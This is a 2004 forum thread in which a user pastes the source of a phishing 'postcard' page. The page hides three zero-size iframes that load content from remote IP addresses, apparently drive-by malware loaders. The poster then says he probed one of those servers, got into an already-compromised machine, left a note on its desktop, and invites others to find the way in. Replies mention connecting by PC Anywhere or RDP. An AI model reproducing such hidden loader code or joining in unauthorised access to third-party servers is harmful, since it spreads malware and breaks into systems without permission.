| Author | Message | Time |
|---|---|---|
| Thing | [red]I wouldn't recommend loading any of these pages if you are using Winders / IE. [/red] Today I received an email informing me that I had just received a postcard from honey. Knowing that this had to be a phishing deal or attempt at a compromise, I eagerly opened up the email. Ohh goody, a link that I can click on! One "clickety click" and away I went, to retrieve my postcard. I hadn't heard from "honey" since ... well ... uhhh ... never. My newly found web page offered me the text "Not found." Bummer. A quick peek at the source showed me this: [code]<html> <body> Not found. </body> </html> <iframe src="http://221.2.162.20:6180/004/index1.html" width=0 height=0 marginwidth="0" marginheight="0" scrolling="no" frameborder="0" style="position:absolute;width:0px;height:0px;left:-400px;top:-400px;border:0px;"></iframe> <iframe src="http://213.159.117.133/dl/adv50.php" width=0 height=0 marginwidth="0" marginheight="0" scrolling="no" frameborder="0" style="position:absolute;width:0px;height:0px;left:-400px;top:-400px;border:0px;"></iframe> <iframe src="http://206.161.125.149/in.php?wm=1267" width=0 height=0 marginwidth="0" marginheight="0" scrolling="no" frameborder="0" style="position:absolute;width:0px;height:0px;left:-400px;top:-400px;border:0px;"></iframe> <img src=stat.php width=0 height=0 border=0>[/code] A couple of quick scans and a few prods and I discovered a nifty entrance to one of the boxes. Apparently, somebody had already rooted this one and left a gaping hole for his/her buddies. Here is the original link http://221.2.162.20:6180/006/ You might find this educational if you don't do anything silly. If you find the entrance, I left a note on the account's desktop for you. :D | October 23, 2004, 2:25 AM |
| St0rm.iD | I wish I had PC Anywhere right now... | October 23, 2004, 3:26 AM |
| Thing | I don't have PC anywhere, but I do have a RDP client. | October 23, 2004, 4:07 AM |